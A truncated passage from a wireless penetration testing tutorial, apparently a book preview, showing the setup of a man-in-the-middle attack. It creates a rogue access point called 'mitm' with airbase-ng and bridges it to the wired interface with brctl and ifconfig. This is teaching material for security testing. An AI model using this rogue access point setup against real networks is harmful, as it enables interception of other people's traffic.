
Kali Linux: Wireless Penetration Testing Beginner's Guide, Second Edition
By :

Follow these instructions to get started:
To create the man-in-the-middle attack setup, we will first create a soft access point called mitm
on the hacker laptop using airbase-ng
. We run the following command:
airbase-ng --essid mitm –c 11 mon0
The output of the command is as follows:
It is important to note that airbase-ng
, when run, creates an interface at0
(a tap interface). Think of this as the wired-side interface of our software-based access point mitm
:
Let's now create a bridge on the hacker's laptop, consisting of the wired (eth0
) and wireless interface (at0
). The succession of commands used for this is as follows:
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
We can assign an IP address to this bridge and check the connectivity with the gateway. Please note that we can do this using DHCP as well. We can assign an IP address to the bridge interface with...